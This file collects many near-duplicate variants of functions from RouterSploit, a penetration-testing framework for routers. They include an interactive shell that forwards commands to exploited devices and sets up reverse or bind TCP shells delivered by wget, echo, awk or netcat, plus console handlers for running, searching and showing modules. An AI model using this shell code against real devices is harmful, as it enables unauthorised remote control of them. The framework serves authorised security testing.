def shell(exploit, architecture="", method="", **params):
    """Run an interactive prompt that forwards operator input to ``exploit``.

    Every line other than the built-ins below is passed to
    ``exploit.execute`` and the result is printed.

    Built-ins:
        quit / exit                -- leave the prompt.
        reverse_tcp <ip> <port>    -- build a ``reverse_shell`` helper and
                                      invoke the delivery routine selected
                                      by ``method``.

    Args:
        exploit: object exposing ``execute(cmd)``.
        architecture: forwarded unchanged to ``reverse_shell``.
        method: one of "wget", "echo", "awk", "netcat"; anything else
            reports that no reverse shell is available.
        **params: keyword options read by the selected delivery routine
            ('binary', 'location', 'shell').
    """
    while True:
        # Spin until printer_queue reports empty before showing the prompt.
        # NOTE(review): presumably this keeps queued console output from
        # interleaving with the prompt; it is a busy-wait -- confirm intent.
        while not printer_queue.empty():
            pass

        line = raw_input("cmd > ")
        if line in ("quit", "exit"):
            return

        tokens = line.split()
        if not tokens or tokens[0] != "reverse_tcp":
            # Includes the empty line, which is forwarded as-is.
            print_info(exploit.execute(line))
            continue

        if len(tokens) != 3:
            print_error("reverse_tcp <reverse ip> <port>")
            continue

        # lhost/lport are passed through as the raw strings typed by the
        # operator; no validation happens in this function.
        revshell = reverse_shell(exploit, architecture, tokens[1], tokens[2])
        if method == "wget":
            revshell.wget(binary=params['binary'], location=params['location'])
        elif method == "echo":
            revshell.echo(binary=params['binary'], location=params['location'])
        elif method == "awk":
            revshell.awk(binary=params['binary'])
        elif method == "netcat":
            revshell.netcat(binary=params['binary'], shell=params['shell'])
        else:
            print_error("Reverse shell is not available")
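def shell(exploit, architecture="", method="", **params):
    """Run an interactive prompt that forwards operator input to ``exploit``.

    Every line other than the built-ins below is passed to
    ``exploit.execute`` and the result is printed.

    Built-ins:
        quit / exit                -- leave the prompt.
        reverse_tcp <ip> <port>    -- build a ``reverse_shell`` helper and
                                      invoke the delivery routine selected
                                      by ``method``.

    Args:
        exploit: object exposing ``execute(cmd)``.
        architecture: forwarded unchanged to ``reverse_shell``.
        method: one of "wget", "echo", "awk", "netcat"; anything else
            reports that no reverse shell is available.
        **params: keyword options read by the selected delivery routine
            ('binary', 'location', 'shell').
    """
    while 1:
        cmd = raw_input("cmd > ")
        if cmd in ["quit", "exit"]:
            return

        c = cmd.split()
        # An empty or whitespace-only line splits to []; guard before
        # indexing so it no longer raises IndexError and ends the session.
        if c and c[0] == "reverse_tcp":
            if len(c) == 3:
                # lhost/lport stay as the raw operator-supplied strings.
                lhost = c[1]
                lport = c[2]
                revshell = reverse_shell(exploit, architecture, lhost, lport)
                if method == "wget":
                    revshell.wget(binary=params['binary'], location=params['location'])
                elif method == "echo":
                    revshell.echo(binary=params['binary'], location=params['location'])
                elif method == "awk":
                    revshell.awk(binary=params['binary'])
                elif method == "netcat":
                    revshell.netcat(binary=params['binary'], shell=params['shell'])
                else:
                    print_error("Reverse shell is not available")
            else:
                print_error("reverse_tcp <reverse ip> <port>")
        else:
            print_info(exploit.execute(cmd))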
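def command_run(self, *args, **kwargs):
    """Run the currently selected module and report failures on the console.

    Ctrl-C during the run is reported as a user cancellation. Any other
    exception is caught here and its traceback is printed instead of
    propagating to the caller.
    """
    utils.print_status("Running module...")
    try:
        self.current_module.run()
    except KeyboardInterrupt:
        utils.print_info()
        utils.print_error("Operation cancelled by user")
    except Exception:
        # format_exc() takes an optional integer ``limit``, not the
        # exc_info tuple; it already formats the exception being handled.
        # Passing the tuple raises TypeError on Python 3, which would
        # replace the module's real error with one from the handler.
        utils.print_error(traceback.format_exc())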
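def command_run(self, *args, **kwargs):
    """Run the currently selected module and report failures on the console.

    Ctrl-C during the run is reported as a user cancellation. Any other
    ``Exception`` is caught here and its traceback is printed instead of
    propagating to the caller.
    """
    utils.print_status("Running module...")
    try:
        self.current_module.run()
    except KeyboardInterrupt:
        utils.print_info()
        utils.print_error("Operation cancelled by user")
    except Exception:
        # Narrowed from a bare ``except:`` so SystemExit and GeneratorExit
        # are no longer swallowed by the error printer.
        # format_exc() takes an optional integer ``limit``, not the
        # exc_info tuple; it already formats the exception being handled.
        utils.print_error(traceback.format_exc())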
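def command_run(self, *args, **kwargs):
    """Validate the current module's setup, then run it.

    ``validate_setup()`` is called before the "Running module..." status
    line, so an ``OptionValidationError`` is reported without the module
    being started. Ctrl-C is reported as a user cancellation; any other
    exception is caught and its traceback printed.
    """
    try:
        self.current_module.validate_setup()
        utils.print_status("Running module...")
        self.current_module.run()
    except KeyboardInterrupt:
        utils.print_info()
        utils.print_error("Operation cancelled by user")
    except OptionValidationError as err:
        utils.print_error(err)
    except Exception:
        # format_exc() takes an optional integer ``limit``, not the
        # exc_info tuple; it already formats the exception being handled.
        # Passing the tuple raises TypeError on Python 3, which would
        # replace the module's real error with one from the handler.
        utils.print_error(traceback.format_exc())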
def command_search(self, *args, **kwargs):
    """Print every known module whose path contains the search keyword.

    The keyword is ``args[0]``. Matching is a plain substring test against
    the raw entries of ``self.modules``; the printed form is the result of
    ``utils.humanize_path`` with the keyword wrapped in red ANSI escapes.
    """
    keyword = args[0]
    if not keyword:
        utils.print_error(
            "Please specify search keyword. e.g. 'search cisco'")
        return

    highlighted = "{}\033[31m{}\033[0m{}"
    for module_path in self.modules:
        if keyword not in module_path:
            continue
        readable = utils.humanize_path(module_path)
        # partition() returns (readable, '', '') when the keyword is not
        # present in the humanized form, so the line is printed unhighlighted.
        before, match, after = readable.partition(keyword)
        utils.print_info(highlighted.format(before, match, after))
def command_search(self, *args, **kwargs):
    """List modules matching a keyword, highlighting the match in red.

    ``args[0]`` is the keyword. An empty keyword prints a usage hint and
    returns. The substring test runs on the raw module path; highlighting
    runs on the path after ``utils.humanize_path``.
    """
    keyword = args[0]
    if not keyword:
        utils.print_error("Please specify search keyword. e.g. 'search cisco'")
        return

    hits = (path for path in self.modules if keyword in path)
    for hit in hits:
        pretty = utils.humanize_path(hit)
        # \033[31m ... \033[0m: red foreground, then reset.
        pieces = pretty.partition(keyword)
        utils.print_info("{}\033[31m{}\033[0m{}".format(*pieces))
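def shell(exploit, architecture="", method="", **params):
    """Run an interactive prompt that forwards operator input to ``exploit``.

    Every line other than the built-ins below is passed to
    ``exploit.execute`` and the result is printed.

    Built-ins:
        quit / exit                        -- leave the prompt.
        bind_tcp <rport> <lhost> <lport>   -- build a ``bind_tcp`` payload.
        reverse_tcp <lhost> <lport>        -- build a ``reverse_tcp`` payload.

    After a payload is built it is wrapped in ``Communication`` and the
    delivery routine named by ``method`` ("wget", "echo", "awk", "netcat")
    is invoked; any other ``method`` value does nothing further.

    Args:
        exploit: object exposing ``execute(cmd)`` and ``target``.
        architecture: forwarded unchanged to the payload constructors.
        method: name of the delivery routine.
        **params: keyword options read by the delivery routine
            ('binary', 'location', 'shell').
    """
    while 1:
        # Spin until printer_queue reports empty before showing the prompt.
        while not printer_queue.empty():
            pass

        cmd = raw_input("cmd > ")
        if cmd in ["quit", "exit"]:
            return

        c = cmd.split()
        if len(c) and (c[0] == "bind_tcp" or c[0] == "reverse_tcp"):
            options = {}
            if c[0] == "bind_tcp":
                try:
                    options['technique'] = "bind_tcp"
                    options['rhost'] = validators.ipv4(exploit.target)
                    options['rport'] = int(c[1])
                    options['lhost'] = c[2]
                    options['lport'] = int(c[3])
                except Exception:
                    # Missing or non-numeric arguments: show usage and go
                    # back to the prompt. Previously execution fell through
                    # and failed with KeyError on the half-filled options.
                    print_error("bind_tcp <rport> <lhost> <lport>")
                    continue

                payload = bind_tcp(architecture, options['rport'])
            elif c[0] == "reverse_tcp":
                try:
                    options['technique'] = "reverse_tcp"
                    options['lhost'] = c[1]
                    options['lport'] = int(c[2])
                except Exception:
                    # Same as above: stop here instead of using options
                    # that were never set.
                    print_error("reverse_tcp <lhost> <lport>")
                    continue

                payload = reverse_tcp(architecture, options['lhost'], options['lport'])

            communication = Communication(exploit, payload, options)
            if method == "wget":
                communication.wget(binary=params['binary'], location=params['location'])
            elif method == "echo":
                communication.echo(binary=params['binary'], location=params['location'])
            elif method == "awk":
                communication.awk(binary=params['binary'])
            elif method == "netcat":
                communication.netcat(binary=params['binary'], shell=params['shell'])
        else:
            print_info(exploit.execute(cmd))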
def command_show(self, *args, **kwargs):
    """Handle ``show info`` and ``show options`` for the current module.

    ``args[0]`` selects the view. ``info`` prints selected metadata fields
    in a fixed order; ``options`` prints the target options ('port',
    'target') and, when present, the remaining module options as tables.
    Any other value prints a hint naming the two supported sub-commands.
    """
    info, options = 'info', 'options'
    topic = args[0]

    if topic == info:
        field_order = ("name", "description", "targets", "authors", "references")
        utils.pprint_dict_in_order(field_order, self.module_metadata)
        utils.print_info()
        return

    if topic == options:
        target_opts = {'port', 'target'}
        # Everything the module declares beyond the two target options.
        module_opts = set(self.current_module.options) - target_opts
        columns = ("Name", "Current settings", "Description")

        utils.print_info('\nTarget options:')
        utils.print_table(columns, *self.get_opts(*target_opts))
        if module_opts:
            utils.print_info('\nModule options:')
            utils.print_table(columns, *self.get_opts(*module_opts))
        utils.print_info()
        return

    message = "Unknown command 'show {}'. You want to 'show {}' or 'show {}'?"
    print(message.format(topic, info, options))
def _show_devices(self, *args, **kwargs):  # TODO: cover with tests
    """Print a numbered list of the current module's target devices.

    The list is read from ``self.current_module._Exploit__info__['devices']``.
    Entries that are dicts are shown by their 'name' key; anything else is
    printed as-is. A ``KeyError`` anywhere in the listing (a missing
    'devices' entry or a dict without 'name') prints the "not defined"
    message instead.
    """
    try:
        device_list = self.current_module._Exploit__info__['devices']
        utils.print_info("\nTarget devices:")
        for index, entry in enumerate(device_list):
            label = entry['name'] if isinstance(entry, dict) else entry
            utils.print_info(" {} - {}".format(index, label))
        utils.print_info()
    except KeyError:
        utils.print_info("\nTarget devices are not defined")
def command_show(self, *args, **kwargs):
    """Handle ``show info`` and ``show options`` for the current module.

    ``args[0]`` selects the view. ``info`` prints the metadata fields that
    exist, in a fixed order, expanding list values one item per line;
    ``options`` prints target and module option tables. Any other value
    prints a hint naming the two supported sub-commands.
    """
    info, options = 'info', 'options'
    sub_command = args[0]

    if sub_command == info:
        metadata = self.module_metadata
        for field in ("name", "description", "targets", "authors", "references"):  # TODO refactor this.
            if field not in metadata.keys():
                continue
            print("\n{}:".format(field.capitalize()))
            value = metadata[field]
            # Exact type check kept on purpose: only plain lists are expanded.
            if type(value) is list:
                for item in value:
                    print("- {}".format(item))
            else:
                print(value)
        print()
    elif sub_command == options:
        target_opts = {'port', 'target'}
        module_opts = set(self.current_module.options) - target_opts
        columns = ("Name", "Current settings", "Description")

        utils.print_info('\nTarget options:')
        utils.print_table(columns, *self.get_opts(*target_opts))
        if module_opts:
            utils.print_info('\nModule options:')
            utils.print_table(columns, *self.get_opts(*module_opts))
        utils.print_info()
    else:
        hint = "Unknown command 'show {}'. You want to 'show {}' or 'show {}'?"
        print(hint.format(sub_command, info, options))
def command_show(self, *args, **kwargs):
    """Print module metadata (``show info``) or option tables (``show options``).

    ``args[0]`` is the sub-command. Unknown sub-commands print a hint that
    names the two supported ones.
    """
    info, options = 'info', 'options'
    requested = args[0]

    if requested == info:
        ordered_fields = ["name", "description", "targets", "authors", "references"]
        present = [f for f in ordered_fields if f in self.module_metadata.keys()]
        for field in present:  # TODO refactor this.
            print("\n{}:".format(field.capitalize()))
            # Exact type check kept on purpose: only plain lists are expanded.
            if type(self.module_metadata[field]) is list:
                for entry in self.module_metadata[field]:
                    print("- {}".format(entry))
            else:
                print(self.module_metadata[field])
        print()
    elif requested == options:
        target_opts = {'port', 'target'}
        module_opts = set(self.current_module.options).difference(target_opts)
        table_header = ("Name", "Current settings", "Description")

        utils.print_info('\nTarget options:')
        utils.print_table(table_header, *self.get_opts(*target_opts))
        if module_opts:
            utils.print_info('\nModule options:')
            utils.print_table(table_header, *self.get_opts(*module_opts))
        utils.print_info()
    else:
        print(
            "Unknown command 'show {}'. You want to 'show {}' or 'show {}'?"
            .format(requested, info, options))
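def run_threads(self, threads, target, *args, **kwargs):
    """Start ``threads`` worker threads running ``target`` and wait for them.

    Each worker receives a shared ``threading.Event`` as its first
    positional argument, followed by ``args`` and ``kwargs``. The event is
    set when the workers start and cleared on Ctrl-C; the elapsed time is
    printed once all workers have been joined.

    Args:
        threads: number of workers; converted with ``int()``.
        target: callable executed by every worker.
    """
    workers = []
    threads_running = threading.Event()
    threads_running.set()

    for worker_id in xrange(int(threads)):
        worker = threading.Thread(
            target=target,
            args=chain((threads_running, ), args),
            kwargs=kwargs,
            name='worker-{}'.format(worker_id),
        )
        workers.append(worker)
        worker.start()

    start = time.time()
    try:
        # Poll every worker with a timed join, not only the last one
        # started: the main thread stays responsive to Ctrl-C until all of
        # them have finished, and a thread count of 0 no longer hits an
        # unbound ``worker`` name.
        for worker in workers:
            while worker.isAlive():
                worker.join(1)
    except KeyboardInterrupt:
        # Clear the shared event; workers are expected to check it and stop.
        threads_running.clear()

    for worker in workers:
        worker.join()
    print_info('Elapsed time: ', time.time() - start, 'seconds')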
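def run_threads(self, threads, target, *args, **kwargs):
    """Run ``target`` in ``threads`` worker threads and block until done.

    A shared ``threading.Event`` is prepended to each worker's positional
    arguments. It is set before the workers start and cleared when the
    operator presses Ctrl-C. The elapsed wall-clock time is printed after
    every worker has been joined.

    Args:
        threads: number of workers; converted with ``int()``.
        target: callable executed by every worker.
    """
    workers = []
    threads_running = threading.Event()
    threads_running.set()

    for worker_id in xrange(int(threads)):
        worker = threading.Thread(
            target=target,
            args=chain((threads_running,), args),
            kwargs=kwargs,
            name='worker-{}'.format(worker_id),
        )
        workers.append(worker)
        worker.start()

    start = time.time()
    try:
        # Wait on all workers with a timeout. The previous loop watched only
        # the most recently started thread, so it could fall through to the
        # untimed joins while others were still running, and it raised on
        # an unbound ``worker`` when no thread was started.
        for worker in workers:
            while worker.isAlive():
                worker.join(1)
    except KeyboardInterrupt:
        # Clear the shared event; workers are expected to check it and stop.
        threads_running.clear()

    for worker in workers:
        worker.join()
    print_info('Elapsed time: ', time.time() - start, 'seconds')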
def _show_options(self, *args, **kwargs):
    """Print the current module's options as two tables.

    'port' and 'target' are listed under "Target options"; every other
    option the module declares goes under "Module options", which is
    omitted when there are none.
    """
    reserved = {'port', 'target'}
    extras = set(self.current_module.options).difference(reserved)
    columns = ("Name", "Current settings", "Description")

    utils.print_info('\nTarget options:')
    utils.print_table(columns, *self.get_opts(*reserved))

    if extras:
        utils.print_info('\nModule options:')
        utils.print_table(columns, *self.get_opts(*extras))

    utils.print_info()
def _show_options(self, *args, **kwargs):
    """Print the current module's options as two tables.

    The six connection-related names (target, port, rhost, rport, lhost,
    lport) are listed under "Target options"; every other option the
    module declares goes under "Module options", in declaration order.
    The second table is omitted when there are no such options.
    """
    target_opts = ['target', 'port', 'rhost', 'rport', 'lhost', 'lport']

    module_opts = []
    for name in self.current_module.options:
        if name not in target_opts:
            module_opts.append(name)

    columns = ("Name", "Current settings", "Description")

    utils.print_info('\nTarget options:')
    utils.print_table(columns, *self.get_opts(*target_opts))

    if module_opts:
        utils.print_info('\nModule options:')
        utils.print_table(columns, *self.get_opts(*module_opts))

    utils.print_info()
def command_show(self, *args, **kwargs):
    """Handle ``show info``, ``show options`` and ``show devices``.

    ``args[0]`` selects the view. ``devices`` prints a numbered list read
    from the module's ``_Exploit__info__['devices']`` entry, showing dict
    entries by their 'name' key. Any other value prints a hint (which
    names only ``info`` and ``options``).
    """
    info, options, devices = 'info', 'options', 'devices'
    topic = args[0]

    if topic == info:
        utils.pprint_dict_in_order(
            self.module_metadata,
            ("name", "description", "devices", "authors", "references"),
        )
        utils.print_info()
    elif topic == options:
        target_opts = {'port', 'target'}
        module_opts = set(self.current_module.options) - target_opts
        columns = ("Name", "Current settings", "Description")

        utils.print_info('\nTarget options:')
        utils.print_table(columns, *self.get_opts(*target_opts))
        if module_opts:
            utils.print_info('\nModule options:')
            utils.print_table(columns, *self.get_opts(*module_opts))
        utils.print_info()
    elif topic == devices:
        if devices not in self.current_module._Exploit__info__.keys():
            print("\nTarget devices are not defined")
        else:
            device_list = self.current_module._Exploit__info__['devices']
            print("\nTarget devices:")
            for index, entry in enumerate(device_list):
                if isinstance(entry, dict):
                    print(" {} - {}".format(index, entry['name']))
                else:
                    print(" {} - {}".format(index, entry))
            print()
    else:
        print(
            "Unknown command 'show {}'. You want to 'show {}' or 'show {}'?"
            .format(topic, info, options))
def command_show(self, *args, **kwargs):
    """Print module info, option tables or the target device list.

    ``args[0]`` is the sub-command: ``info``, ``options`` or ``devices``.
    The fallback hint for unknown sub-commands names only ``info`` and
    ``options``.
    """
    info, options, devices = 'info', 'options', 'devices'
    requested = args[0]

    if requested == info:
        field_order = ("name", "description", "devices", "authors", "references")
        utils.pprint_dict_in_order(self.module_metadata, field_order)
        utils.print_info()
    elif requested == options:
        target_opts = {'port', 'target'}
        module_opts = set(self.current_module.options).difference(target_opts)
        table_header = ("Name", "Current settings", "Description")

        utils.print_info('\nTarget options:')
        utils.print_table(table_header, *self.get_opts(*target_opts))
        if module_opts:
            utils.print_info('\nModule options:')
            utils.print_table(table_header, *self.get_opts(*module_opts))
        utils.print_info()
    elif requested == devices:
        if devices in self.current_module._Exploit__info__.keys():
            known = self.current_module._Exploit__info__['devices']
            print("\nTarget devices:")
            position = 0
            for item in known:
                # Dict entries are displayed by their 'name' key.
                shown = item['name'] if isinstance(item, dict) else item
                print(" {} - {}".format(position, shown))
                position += 1
            print()
        else:
            print("\nTarget devices are not defined")
    else:
        print("Unknown command 'show {}'. You want to 'show {}' or 'show {}'?".format(requested, info, options))
def _show_options(self, *args, **kwargs):
    """Show target options and, if any, the remaining module options.

    Target options are the fixed names target, port, rhost, rport, lhost
    and lport. Module options are whatever else ``self.current_module``
    declares, kept in declaration order.
    """
    connection_names = ['target', 'port', 'rhost', 'rport', 'lhost', 'lport']
    remaining = [
        declared for declared in self.current_module.options
        if declared not in connection_names
    ]
    table_header = ("Name", "Current settings", "Description")

    utils.print_info('\nTarget options:')
    utils.print_table(table_header, *self.get_opts(*connection_names))
    if remaining:
        utils.print_info('\nModule options:')
        utils.print_table(table_header, *self.get_opts(*remaining))
    utils.print_info()
def command_show(self, *args, **kwargs):
    """Handle ``show info`` and ``show options`` for the current module.

    ``args[0]`` selects the view. ``info`` prints selected metadata fields
    in a fixed order; ``options`` prints the target options ('port',
    'target') and, when present, the remaining module options. Any other
    value prints a hint naming the two supported sub-commands.
    """
    info, options = 'info', 'options'
    topic = args[0]

    if topic == info:
        field_order = ("name", "description", "devices", "authors", "references")
        utils.pprint_dict_in_order(self.module_metadata, field_order)
        utils.print_info()
        return

    if topic != options:
        print("Unknown command 'show {}'. You want to 'show {}' or 'show {}'?".format(topic, info, options))
        return

    target_opts = {'port', 'target'}
    module_opts = set(self.current_module.options) - target_opts
    columns = ("Name", "Current settings", "Description")

    utils.print_info('\nTarget options:')
    utils.print_table(columns, *self.get_opts(*target_opts))
    if module_opts:
        utils.print_info('\nModule options:')
        utils.print_table(columns, *self.get_opts(*module_opts))
    utils.print_info()
def start(self):
    """Routersploit main entry point: print the banner and run the prompt loop.

    Each iteration reads one line, parses it into a command and its
    arguments, and dispatches to the matching handler. A
    ``RoutersploitException`` is printed and the loop continues; Ctrl-C
    only prints a blank line; EOF prints a stop message and ends the loop.
    ``printer_queue.join()`` runs after every iteration, including the
    last one.
    """
    utils.print_info(self.banner)
    printer_queue.join()

    while True:
        try:
            line = raw_input(self.prompt)
            command, args = self.parse_line(line)
            if command:
                handler = self.get_command_handler(command)
                handler(args)
        except RoutersploitException as err:
            utils.print_error(err)
        except EOFError:
            utils.print_info()
            utils.print_status("routersploit stopped")
            break
        except KeyboardInterrupt:
            utils.print_info()
        finally:
            # Runs on every path out of the try block, including the break.
            printer_queue.join()
def command_debug(self, *args, **kwargs):
    """Print each entry of ``self.modules_with_errors``.

    The key is printed as an info line and the value as an error line
    followed by a newline argument.
    """
    for module_path, error in self.modules_with_errors.iteritems():
        utils.print_info(module_path)
        utils.print_error(error, '\n')
def shell(exploit, architecture="", method="", payloads=None, **params):
    """Run the interactive ``cmd`` prompt for an exploit module.

    The prompt has two states. With no payload selected, input is either a
    built-in ('quit', 'exit', 'show payloads', 'set payload <name>') or is
    passed to ``exploit.execute`` and the result printed. With a payload
    selected, 'show options', 'set <option> <value>', 'run' and 'back' are
    handled as well; other input in that state is ignored.

    Args:
        exploit: object exposing ``execute(cmd)`` and ``target``.
        architecture: sub-directory name used to build the payload path.
        method: delivery method read by 'run' ("wget", "echo", "generic").
        payloads: optional list of selectable payload names; when empty or
            None the list is built from the ``.py`` files in the payload
            directory.
        **params: forwarded to ``Communication``.
    """
    path = "routersploit/modules/payloads/{}/".format(architecture)
    payload = None
    options = []

    if not payloads:
        # Discover payload names from the module files on disk, skipping
        # the package marker.
        payloads = [
            f.split(".")[0] for f in listdir(path)
            if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"
        ]

    print_info()
    print_success(
        "Welcome to cmd. Commands are sent to the target via the execute method."
    )
    print_status(
        "Depending on the vulnerability, command's results might not be available."
    )
    print_status(
        "For further exploitation use 'show payloads' and 'set payload <payload>' commands."
    )
    print_info()

    while 1:
        # Spin until printer_queue reports empty before showing the prompt.
        # NOTE(review): this is a busy-wait -- confirm it is intentional.
        while not printer_queue.empty():
            pass

        # NOTE(review): \001 and \002 are presumably readline's markers
        # around non-printing escape sequences -- confirm.
        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(
                payload._Exploit__info__['name'])

        cmd = raw_input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            print_status("Available payloads:")
            for payload_name in payloads:
                print_info("- {}".format(payload_name))

        elif cmd.startswith("set payload "):
            c = cmd.split(" ")

            # The typed name is only imported when it appears in
            # ``payloads``. That list is the allowlist for the dynamic
            # import below, so a caller-supplied ``payloads`` argument
            # decides which module paths can be loaded.
            if c[2] in payloads:
                payload_path = path.replace("/", ".") + c[2]
                payload = getattr(importlib.import_module(payload_path), 'Exploit')()

                # Rebuild the option rows: [name, current value, description].
                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([
                            option,
                            getattr(payload, option),
                            payload.exploit_attributes[option]
                        ])

                if payload.handler == "bind_tcp":
                    options.append([
                        "rhost",
                        validators.ipv4(exploit.target),
                        "Target IP address"
                    ])

                    if method == "wget":
                        options.append(
                            ["lhost", "", "Connect-back IP address for wget"])
                        options.append(
                            ["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")

                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # Only names already present in ``options`` can be set;
                    # an unknown name is silently ignored.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(
                                    c[1]))
                                break

                            option[1] = c[2]
                            print_success("{'" + c[1] + "': '" + c[2] + "'}")

            elif cmd == "run":
                data = payload.generate()

                # NOTE(review): ``communication`` is assigned only in the
                # three branches below; with any other ``method`` the
                # handler calls further down use an unassigned name or a
                # value left over from an earlier 'run'.
                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "generic":
                    params['exec_binary'] = data
                    communication = Communication(exploit, "", options, **params)

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                # Drop the selected payload and return to the plain prompt.
                payload = None

        else:
            # No payload selected and not a built-in: forward the raw line.
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))
def command_help(self, *args, **kwargs):
    """Print the global help text, plus module help when a module is selected."""
    utils.print_info(self.global_help)
    if not self.current_module:
        return
    utils.print_info("\n", self.module_help)
def __show_modules(self, root=''):
    """Print every module path that starts with ``root``.

    Dots in the dotted module path are replaced with the OS path separator
    for display. The default ``root`` of '' matches every module.
    """
    selected = [path for path in self.modules if path.startswith(root)]
    for dotted in selected:
        utils.print_info(dotted.replace('.', os.sep))
def _show_info(self, *args, **kwargs):
    """Print the current module's metadata fields in a fixed order."""
    field_order = ("name", "description", "devices", "authors", "references")
    utils.pprint_dict_in_order(self.module_metadata, field_order)
    utils.print_info()
def shell(exploit, architecture="", method="", payloads=None, **params):
    """Interactive ``cmd`` prompt: forward commands or configure a payload.

    Without a selected payload, a line is either a built-in ('quit',
    'exit', 'show payloads', 'set payload <name>') or is handed to
    ``exploit.execute`` and its result printed. Once a payload is
    selected, 'show options', 'set <option> <value>', 'run' and 'back'
    become available; any other line typed in that state does nothing.

    Args:
        exploit: object exposing ``execute(cmd)`` and ``target``.
        architecture: sub-directory name used to build the payload path.
        method: delivery method read by 'run' ("wget", "echo", "generic").
        payloads: optional list of selectable payload names; when empty or
            None it is derived from the ``.py`` files in the payload
            directory.
        **params: forwarded to ``Communication``.
    """
    path = "routersploit/modules/payloads/{}/".format(architecture)
    payload = None
    options = []

    if not payloads:
        # Every .py file in the directory except __init__.py is offered.
        payloads = [f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"]

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("Depending on the vulnerability, command's results might not be available.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while 1:
        # Spin until printer_queue reports empty before showing the prompt.
        # NOTE(review): this is a busy-wait -- confirm it is intentional.
        while not printer_queue.empty():
            pass

        # The prompt shows the selected payload's name, when there is one.
        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__['name'])

        cmd = raw_input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            print_status("Available payloads:")
            for payload_name in payloads:
                print_info("- {}".format(payload_name))

        elif cmd.startswith("set payload "):
            c = cmd.split(" ")

            # Membership in ``payloads`` is the only check applied before
            # the name is appended to the import path below.
            if c[2] in payloads:
                payload_path = path.replace("/", ".") + c[2]
                payload = getattr(importlib.import_module(payload_path), 'Exploit')()

                # Option rows are [name, current value, description];
                # 'output' and 'filepath' are not exposed at this prompt.
                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([option, getattr(payload, option), payload.exploit_attributes[option]])

                if payload.handler == "bind_tcp":
                    options.append(["rhost", validators.ipv4(exploit.target), "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")

                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # Splitting on a single space means a value containing
                    # spaces fails the length check above.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            # Reached only when setattr succeeded.
                            option[1] = c[2]
                            print_success("{'" + c[1] + "': '" + c[2] + "'}")

            elif cmd == "run":
                data = payload.generate()

                # NOTE(review): ``communication`` is assigned only in the
                # three branches below; with any other ``method`` the
                # handler calls further down use an unassigned name or a
                # value left over from an earlier 'run'.
                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "generic":
                    params['exec_binary'] = data
                    communication = Communication(exploit, "", options, **params)

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                # Drop the selected payload and return to the plain prompt.
                payload = None

        else:
            # No payload selected and not a built-in: forward the raw line.
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))
def __show_modules(self, root=''):
    """List the modules under ``root``, shown as filesystem-style paths.

    A module is selected when its dotted path starts with ``root``; each
    '.' is replaced with ``os.sep`` before printing.
    """
    matching = [name for name in self.modules if name.startswith(root)]
    for name in matching:
        as_path = name.replace('.', os.sep)
        utils.print_info(as_path)
def command_search(self, *args, **kwargs):  # TODO cover with unit tests
    """Print the modules whose dotted path contains any of the given terms.

    Each positional argument is searched independently, so a module that
    matches several terms is printed once per matching term. Dots in the
    printed path are replaced with '/'.
    """
    for term in args:
        hits = [path for path in self.modules if term in path]
        for hit in hits:
            utils.print_info(hit.replace('.', '/'))